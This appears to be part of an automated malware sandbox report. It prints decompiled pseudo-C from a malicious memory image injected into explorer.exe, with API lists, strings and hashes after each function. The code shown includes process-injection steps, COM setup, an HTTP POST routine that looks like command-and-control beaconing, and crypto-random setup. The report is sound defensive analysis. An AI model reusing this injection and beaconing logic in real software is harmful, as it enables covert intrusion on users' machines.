        								_t244 = _t243 - 1;
        								__eflags = _t244;
        								if(_t244 == 0) {
        									goto L35;
        								}
        								_t245 = _t244 - 1;
        								__eflags = _t245;
        								if(_t245 == 0) {
        									goto L35;
        								}
        								__eflags = _t245 != 5;
        								if(_t245 != 5) {
        									goto L28;
        								}
        								_t298 = _v72;
        								goto L31;
        							}
        							__imp__#16(_v24);
        							_t210 = _v28;
        							 *((intOrPtr*)( *_t210 + 8))(_t210);
        							_t252 = _v20;
        							L42:
        							_t262 = _v32;
        							_t252 = _t252 + 1;
        							_v20 = _t252;
        							__eflags = _t262;
        							if(_t262 != 0) {
        								continue;
        							}
        							L48:
        							_t324 = _v40;
        							goto L49;
        						}
        						_t247 = _v28;
        						 *((intOrPtr*)( *_t247 + 8))(_t247);
        						goto L42;
        					}
        					_t262 = _v32;
        					goto L48;
        				} else {
        					E000C861A( &_v36, _t322);
        					_t320 = _v36;
        					goto L53;
        				}
        			}

        APIs
          • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
          • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
          • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
          • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
          • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
        • SysFreeString.OLEAUT32(?), ref: 000CDF82
        • SysFreeString.OLEAUT32(?), ref: 000CDF8B
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: 8ff7c3086821ec5c3540cefe09e58b23ae2bf53af81bd7aab689222b4ac706ed
        • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
        • Opcode Fuzzy Hash: 8ff7c3086821ec5c3540cefe09e58b23ae2bf53af81bd7aab689222b4ac706ed
        • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 59%
        			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
        				signed int _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				char _v32;
        				intOrPtr _v36;
        				struct HINSTANCE__* _v40;
        				char _v44;
        				char _v56;
        				char _v72;
        				struct _WNDCLASSEXA _v120;
        				intOrPtr _t69;
        				intOrPtr _t71;
        				intOrPtr _t75;
        				intOrPtr _t80;
        				intOrPtr _t92;
        				intOrPtr _t95;
        				intOrPtr _t96;
        				struct HWND__* _t106;
        				intOrPtr* _t113;
        				struct HINSTANCE__* _t116;
        				intOrPtr _t120;
        				intOrPtr _t126;
        				intOrPtr _t131;
        				intOrPtr _t134;
        				intOrPtr _t136;
        				intOrPtr _t139;
        				char _t140;
        				intOrPtr _t141;
        
        				_t69 =  *0xde688; // 0xf0000
        				_t126 = __ecx;
        				_t134 = __edx;
        				_t116 = 0;
        				_v36 = __edx;
        				_v16 = 0;
        				_v44 = 0;
        				_v40 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				_v24 = 0;
        				_v20 = __ecx;
        				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
        					E000CE23E(0x1f4);
        					_t116 = 0;
        				}
        				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
        				_v28 = _t116;
        				if( *_t113 != 0x4550) {
        					L12:
        					if(_v8 != 0) {
        						_t75 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
        						_v8 = _v8 & 0x00000000;
        					}
        					L14:
        					if(_v12 != 0) {
        						_t136 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
        					}
        					if(_v16 != 0) {
        						_t71 =  *0xde780; // 0x0
        						 *((intOrPtr*)(_t71 + 0x20))(_v16);
        					}
        					return _v8;
        				}
        				_push(_t116);
        				_push(0x8000000);
        				_v44 =  *((intOrPtr*)(_t113 + 0x50));
        				_push(0x40);
        				_push( &_v44);
        				_push(_t116);
        				_push(0xe);
        				_push( &_v16);
        				_t80 =  *0xde780; // 0x0
        				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
        					goto L12;
        				}
        				_v120.style = 0xb;
        				_v120.cbSize = 0x30;
        				_v120.lpszClassName =  &_v56;
        				asm("movsd");
        				_v120.lpfnWndProc = DefWindowProcA;
        				asm("movsd");
        				asm("movsd");
        				asm("movsb");
        				asm("movsd");
        				asm("movsd");
        				asm("movsw");
        				asm("movsb");
        				_v120.cbWndExtra = 0;
        				_v120.lpszMenuName = 0;
        				_v120.cbClsExtra = 0;
        				_v120.hInstance = 0;
        				if(RegisterClassExA( &_v120) != 0) {
        					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
        					if(_t106 != 0) {
        						DestroyWindow(_t106);
        						UnregisterClassA( &_v56, 0);
        					}
        				}
        				_t139 =  *0xde780; // 0x0
        				_push(0x40);
        				_push(0);
        				_push(2);
        				_push( &_v24);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push( &_v12);
        				_push(GetCurrentProcess());
        				_push(_v16);
        				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
        					_t126 = _v20;
        					goto L12;
        				} else {
        					_push(0x40);
        					_push(0);
        					_push(2);
        					_push( &_v24);
        					_push(0);
        					_push(0);
        					_push(0);
        					_t126 = _v20;
        					_push( &_v8);
        					_t92 =  *0xde780; // 0x0
        					_push(_t126);
        					_push(_v16);
        					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
        						goto L12;
        					}
        					_t140 = E000C8669( *0xde688, 0x1ac4);
        					_v32 = _t140;
        					if(_t140 == 0) {
        						goto L12;
        					}
        					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
        					_t95 =  *0xde684; // 0x280f8f0
        					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
        					_t120 =  *0xde684; // 0x280f8f0
        					_t131 = _t96;
        					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
        					E000C861A( &_v32, 0x1ac4);
        					_t141 =  *0xde688; // 0xf0000
        					 *0xde688 = _t131;
        					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
        					E000CC63F(_v12, _v8, _v36);
        					 *0xde688 = _t141;
        					goto L14;
        				}
        			}

        APIs
        • RegisterClassExA.USER32 ref: 000CC785
        • CreateWindowExA.USER32 ref: 000CC7B0
        • DestroyWindow.USER32 ref: 000CC7BB
        • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: 695057daa4e252ea4eb13b3b64219fcdfa60d910730aafe074950a3034e28f83
        • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
        • Opcode Fuzzy Hash: 695057daa4e252ea4eb13b3b64219fcdfa60d910730aafe074950a3034e28f83
        • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
        				char _v8;
        				char _v16;
        				short _v144;
        				short _v664;
        				void* _t19;
        				struct HINSTANCE__* _t22;
        				long _t23;
        				long _t24;
        				char* _t27;
        				WCHAR* _t32;
        				long _t33;
        				intOrPtr _t37;
        				intOrPtr _t38;
        				void* _t49;
        				int _t53;
        				void* _t54;
        				intOrPtr* _t55;
        				void* _t57;
        
        				_t49 = __edx;
        				OutputDebugStringA("Hello qqq");
        				if(_a8 != 1) {
        					if(_a8 != 0) {
        						L12:
        						return 1;
        					}
        					SetLastError(0xaa);
        					L10:
        					return 0;
        				}
        				E000C85EF();
        				_t19 = E000C980C( &_v16);
        				_t57 = _t49;
        				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
        					goto L12;
        				} else {
        					E000C8F78();
        					GetModuleHandleA(0);
        					_t22 = _a4;
        					 *0xde69c = _t22;
        					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
        					_t24 = GetLastError();
        					if(_t23 != 0 && _t24 != 0x7a) {
        						memset( &_v144, 0, 0x80);
        						_t55 = _t54 + 0xc;
        						_t53 = 0;
        						do {
        							_t27 = E000C95C7(_t53);
        							_a8 = _t27;
        							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
        							E000C85C2( &_a8);
        							_t53 = _t53 + 1;
        						} while (_t53 < 0x2710);
        						E000D2A5B( *0xde69c);
        						 *_t55 = 0x7c3;
        						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
        						 *_t55 = 0xb4e;
        						_t32 = E000C95E1(0xdba28);
        						_a8 = _t32;
        						_t33 = GetFileAttributesW(_t32);
        						_push( &_a8);
        						if(_t33 == 0xffffffff) {
        							E000C85D5();
        							_v8 = 0;
        							_t37 =  *0xde684; // 0x280f8f0
        							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
        							 *0xde6a8 = _t38;
        							if(_t38 == 0) {
        								goto L10;
        							}
        							goto L12;
        						}
        						E000C85D5();
        					}
        					goto L10;
        				}
        			}

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
        • SetLastError.KERNEL32(000000AA), ref: 000C60D7
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
        • GetLastError.KERNEL32 ref: 000C5FEF
        • memset.MSVCRT ref: 000C6013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
        • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
        • String ID: Hello qqq
        • API String ID: 3872149766-3610097158
        • Opcode ID: d3311653e6ef723ce3dcc405afcd75808d60402d923c25814b3c7da900617843
        • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
        • Opcode Fuzzy Hash: d3311653e6ef723ce3dcc405afcd75808d60402d923c25814b3c7da900617843
        • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
        				char _v8;
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				intOrPtr _v28;
        				char _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				signed int _v44;
        				intOrPtr _v48;
        				intOrPtr _v52;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				char _v64;
        				int _v76;
        				void* _v80;
        				intOrPtr _v100;
        				int _v104;
        				void* _v108;
        				intOrPtr _v112;
        				intOrPtr _v116;
        				char* _v120;
        				void _v124;
        				char _v140;
        				void _v396;
        				void _v652;
        				intOrPtr _t105;
        				intOrPtr _t113;
        				intOrPtr* _t115;
        				intOrPtr _t118;
        				intOrPtr _t121;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t131;
        				char _t133;
        				intOrPtr _t136;
        				char _t138;
        				char _t139;
        				intOrPtr _t141;
        				intOrPtr _t147;
        				intOrPtr _t154;
        				intOrPtr _t158;
        				intOrPtr _t162;
        				intOrPtr _t164;
        				intOrPtr _t166;
        				intOrPtr _t172;
        				intOrPtr _t176;
        				void* _t183;
        				void* _t185;
        				intOrPtr _t186;
        				char _t195;
        				intOrPtr _t203;
        				intOrPtr _t204;
        				signed int _t209;
        				void _t212;
        				intOrPtr _t213;
        				void* _t214;
        				intOrPtr _t216;
        				char _t217;
        				intOrPtr _t218;
        				signed int _t219;
        				signed int _t220;
        				void* _t221;
        
        				_v40 = _v40 & 0x00000000;
        				_v24 = 4;
        				_v36 = 1;
        				_t214 = __edx;
        				memset( &_v396, 0, 0x100);
        				memset( &_v652, 0, 0x100);
        				_v64 = E000C95C7(0x85b);
        				_v60 = E000C95C7(0xdc9);
        				_v56 = E000C95C7(0x65d);
        				_v52 = E000C95C7(0xdd3);
        				_t105 = E000C95C7(0xb74);
        				_v44 = _v44 & 0;
        				_t212 = 0x3c;
        				_v48 = _t105;
        				memset( &_v124, 0, 0x100);
        				_v116 = 0x10;
        				_v120 =  &_v140;
        				_v124 = _t212;
        				_v108 =  &_v396;
        				_v104 = 0x100;
        				_v80 =  &_v652;
        				_push( &_v124);
        				_push(0);
        				_v76 = 0x100;
        				_push(E000CC379(_t214));
        				_t113 =  *0xde6a4; // 0x0
        				_push(_t214);
        				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
        					_t209 = 0;
        					_v20 = 0;
        					do {
        						_t115 =  *0xde6a4; // 0x0
        						_v12 = 0x8404f700;
        						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
        						if(_t213 != 0) {
        							_t195 = 3;
        							_t185 = 4;
        							_v8 = _t195;
        							_t118 =  *0xde6a4; // 0x0
        							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
        							_v8 = 0x3a98;
        							_t121 =  *0xde6a4; // 0x0
        							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t124 =  *0xde6a4; // 0x0
        							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
        							_v8 = 0x493e0;
        							_t127 =  *0xde6a4; // 0x0
        							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
        							_t131 =  *0xde6a4; // 0x0
        							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
        							if(_a24 != 0) {
        								E000C980C(_a24);
        							}
        							if(_t186 != 0) {
        								_t133 = 0x8484f700;
        								if(_v112 != 4) {
        									_t133 = _v12;
        								}
        								_t136 =  *0xde6a4; // 0x0
        								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
        								_v8 = _t216;
        								if(_a24 != 0) {
        									E000C980C(_a24);
        								}
        								if(_t216 != 0) {
        									_t138 = 4;
        									if(_v112 != _t138) {
        										L19:
        										_t139 = E000C95C7(0x777);
        										_t217 = _t139;
        										_v12 = _t217;
        										_t141 =  *0xde6a4; // 0x0
        										_t218 = _v8;
        										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
        										E000C85C2( &_v12);
        										if(_a24 != 0) {
        											E000C980C(_a24);
        										}
        										if(_v28 != 0) {
        											L28:
        											_v24 = 8;
        											_push(0);
        											_v32 = 0;
        											_v28 = 0;
        											_push( &_v24);
        											_push( &_v32);
        											_t147 =  *0xde6a4; // 0x0
        											_push(0x13);
        											_push(_t218);
        											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
        												_t219 = E000C9749( &_v32);
        												if(_t219 == 0xc8) {
        													 *_a20 = _v8;
        													 *_a12 = _t213;
        													 *_a16 = _t186;
        													return 0;
        												}
        												_t220 =  ~_t219;
        												L32:
        												_t154 =  *0xde6a4; // 0x0
        												 *((intOrPtr*)(_t154 + 8))(_v8);
        												L33:
        												if(_t186 != 0) {
        													_t158 =  *0xde6a4; // 0x0
        													 *((intOrPtr*)(_t158 + 8))(_t186);
        												}
        												if(_t213 != 0) {
        													_t203 =  *0xde6a4; // 0x0
        													 *((intOrPtr*)(_t203 + 8))(_t213);
        												}
        												return _t220;
        											}
        											GetLastError();
        											_t220 = 0xfffffff8;
        											goto L32;
        										} else {
        											GetLastError();
        											_t162 =  *0xde6a4; // 0x0
        											 *((intOrPtr*)(_t162 + 8))(_t218);
        											_t218 = 0;
        											goto L23;
        										}
        									}
        									_v12 = _t138;
        									_push( &_v12);
        									_push( &_v16);
        									_t172 =  *0xde6a4; // 0x0
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
        										L18:
        										GetLastError();
        										goto L19;
        									}
        									_v16 = _v16 | 0x00003380;
        									_push(4);
        									_push( &_v16);
        									_t176 =  *0xde6a4; // 0x0
        									_push(0x1f);
        									_push(_t216);
        									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
        										goto L19;
        									}
        									goto L18;
        								} else {
        									GetLastError();
        									L23:
        									_t164 =  *0xde6a4; // 0x0
        									 *((intOrPtr*)(_t164 + 8))(_t186);
        									_t186 = 0;
        									goto L24;
        								}
        							} else {
        								GetLastError();
        								L24:
        								_t166 =  *0xde6a4; // 0x0
        								 *((intOrPtr*)(_t166 + 8))(_t213);
        								_t213 = 0;
        								goto L25;
        							}
        						}
        						GetLastError();
        						L25:
        						_t204 = _t218;
        						_t209 = _v20 + 1;
        						_v20 = _t209;
        					} while (_t209 < 2);
        					_v8 = _t218;
        					if(_t204 != 0) {
        						goto L28;
        					}
        					_t220 = 0xfffffffe;
        					goto L33;
        				}
        				_t183 = 0xfffffffc;
        				return _t183;
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
        • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 28%
        			E000D16B8(signed int* _a4) {
        				char _v8;
        				_Unknown_base(*)()* _v12;
        				_Unknown_base(*)()* _v16;
        				char _v20;
        				_Unknown_base(*)()* _t16;
        				_Unknown_base(*)()* _t17;
        				void* _t22;
        				intOrPtr* _t28;
        				signed int _t29;
        				signed int _t30;
        				struct HINSTANCE__* _t32;
        				void* _t34;
        
        				_t30 = 0;
        				_v8 = 0;
        				_t32 = GetModuleHandleA("advapi32.dll");
        				if(_t32 == 0) {
        					L9:
        					return 1;
        				}
        				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
        				_v12 = _t16;
        				if(_t16 == 0) {
        					goto L9;
        				}
        				_t17 = GetProcAddress(_t32, "CryptGenRandom");
        				_v16 = _t17;
        				if(_t17 == 0) {
        					goto L9;
        				}
        				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
        				if(_t28 == 0) {
        					goto L9;
        				}
        				_push(0xf0000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push( &_v8);
        				if(_v12() == 0) {
        					goto L9;
        				}
        				_t22 = _v16(_v8, 4,  &_v20);
        				 *_t28(_v8, 0);
        				if(_t22 == 0) {
        					goto L9;
        				}
        				_t29 = 0;
        				do {
        					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
        					_t29 = _t29 + 1;
        				} while (_t29 < 4);
        				 *_a4 = _t30;
        				return 0;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
        • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 87%
        			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
        				signed int _t12;
        				signed int _t13;
        				int _t15;
        				char* _t24;
        				char* _t26;
        				char* _t28;
        				char* _t29;
        				signed int _t40;
        				char* _t43;
        				char* _t45;
        				long long* _t47;
        
        				_t12 = _a20;
        				if(_t12 == 0) {
        					_t12 = 0x11;
        				}
        				_t26 = _a4;
        				_push(_t30);
        				 *_t47 = _a12;
        				_push(_t12);
        				_push("%.*g");
        				_push(_a8);
        				_push(_t26);
        				L000D2285();
        				_t40 = _t12;
        				if(_t40 < 0 || _t40 >= _a8) {
        					L19:
        					_t13 = _t12 | 0xffffffff;
        					goto L20;
        				} else {
        					L000D22CD();
        					_t15 =  *((intOrPtr*)( *_t12));
        					if(_t15 != 0x2e) {
        						_t24 = strchr(_t26, _t15);
        						if(_t24 != 0) {
        							 *_t24 = 0x2e;
        						}
        					}
        					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
        						L11:
        						_t43 = strchr(_t26, 0x65);
        						_t28 = _t43;
        						if(_t43 == 0) {
        							L18:
        							_t13 = _t40;
        							L20:
        							return _t13;
        						}
        						_t45 = _t43 + 1;
        						_t29 = _t28 + 2;
        						if( *_t45 == 0x2d) {
        							_t45 = _t29;
        						}
        						while( *_t29 == 0x30) {
        							_t29 = _t29 + 1;
        						}
        						if(_t29 != _t45) {
        							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
        							_t40 = _t40 + _t45 - _t29;
        						}
        						goto L18;
        					} else {
        						_t6 = _t40 + 3; // 0xd09b2
        						_t12 = _t6;
        						if(_t12 >= _a8) {
        							goto L19;
        						}
        						_t26[_t40] = 0x302e;
        						( &(_t26[2]))[_t40] = 0;
        						_t40 = _t40 + 2;
        						goto L11;
        					}
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: strchr$_snprintflocaleconv
        • String ID: %.*g
        • API String ID: 1910550357-952554281
        • Opcode ID: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction ID: f6153b53931c816f5cf90fdbc4519a87119c60c3e64c05486d80ffcae23a6d65
        • Opcode Fuzzy Hash: 63f8e764568c4758d5cd2e90929b1f83a553a2e246058db04aab280671fdda3b
        • Instruction Fuzzy Hash: B721337B6447427AD7254A289CC6BBA7BCCDF75320F158117FE109A382EA74EC4093B0
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: _snprintfqsort
        • String ID: %I64d$false$null$true
        • API String ID: 756996078-4285102228
        • Opcode ID: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction ID: 684f5bda4ccecb9397834d04cf382ea593694727c20340f8e6e8807afc758164
        • Opcode Fuzzy Hash: 975c1893a9037985b582ba2435764dd0703f05b1ff4280b3f5148ca783a6603e
        • Instruction Fuzzy Hash: 9EE16DB190030ABBDF119F64DC46FEF3BA9EF55344F10801AFD1996242EA31DA619BB0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
        				char _v516;
        				void _v1044;
        				char _v1076;
        				signed int _v1080;
        				signed int _v1096;
        				WCHAR* _v1100;
        				intOrPtr _v1104;
        				signed int _v1108;
        				intOrPtr _v1112;
        				intOrPtr _v1116;
        				char _v1144;
        				char _v1148;
        				void* __esi;
        				intOrPtr _t66;
        				intOrPtr _t73;
        				signed int _t75;
        				intOrPtr _t76;
        				signed int _t81;
        				WCHAR* _t87;
        				void* _t89;
        				signed int _t90;
        				signed int _t91;
        				signed int _t93;
        				signed int _t94;
        				WCHAR* _t96;
        				intOrPtr _t106;
        				intOrPtr _t107;
        				void* _t108;
        				intOrPtr _t109;
        				signed char _t116;
        				WCHAR* _t118;
        				void* _t122;
        				signed int _t123;
        				intOrPtr _t125;
        				void* _t128;
        				void* _t129;
        				WCHAR* _t130;
        				void* _t134;
        				void* _t141;
        				void* _t143;
        				WCHAR* _t145;
        				signed int _t153;
        				void* _t154;
        				void* _t178;
        				signed int _t180;
        				void* _t181;
        				void* _t183;
        				void* _t187;
        				signed int _t188;
        				WCHAR* _t190;
        				signed int _t191;
        				signed int _t192;
        				intOrPtr* _t194;
        				signed int _t196;
        				void* _t199;
        				void* _t200;
        				void* _t201;
        				void* _t202;
        				intOrPtr* _t203;
        				void* _t208;
        
        				_t208 = __fp0;
        				_push(_t191);
        				_t128 = __edx;
        				_t187 = __ecx;
        				_t192 = _t191 | 0xffffffff;
        				memset( &_v1044, 0, 0x20c);
        				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
        				_v1108 = 1;
        				if(_t187 != 0) {
        					_t123 =  *0xde688; // 0xf0000
        					_t125 =  *0xde68c; // 0x280fab8
        					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
        				}
        				if(E000CBB8D(_t187) != 0) {
        					L4:
        					_t134 = _t128;
        					_t66 = E000CB7A8(_t134,  &_v516);
        					_push(_t134);
        					_v1104 = _t66;
        					E000CB67D(_t66,  &_v1076, _t206, _t208);
        					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
        					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
        					E000CB88A(_t141,  &_v1100, _t208);
        					_t175 =  &_v1076;
        					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208);
        					_v1112 = _t73;
        					_t143 = _t141;
        					if(_t73 != 0) {
        						_push(0);
        						_push(_t129);
        						_push("\\");
        						_t130 = E000C92E5(_t73);
        						_t200 = _t199 + 0x10;
        						_t75 =  *0xde688; // 0xf0000
        						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
        							L12:
        							__eflags = _v1108;
        							if(__eflags != 0) {
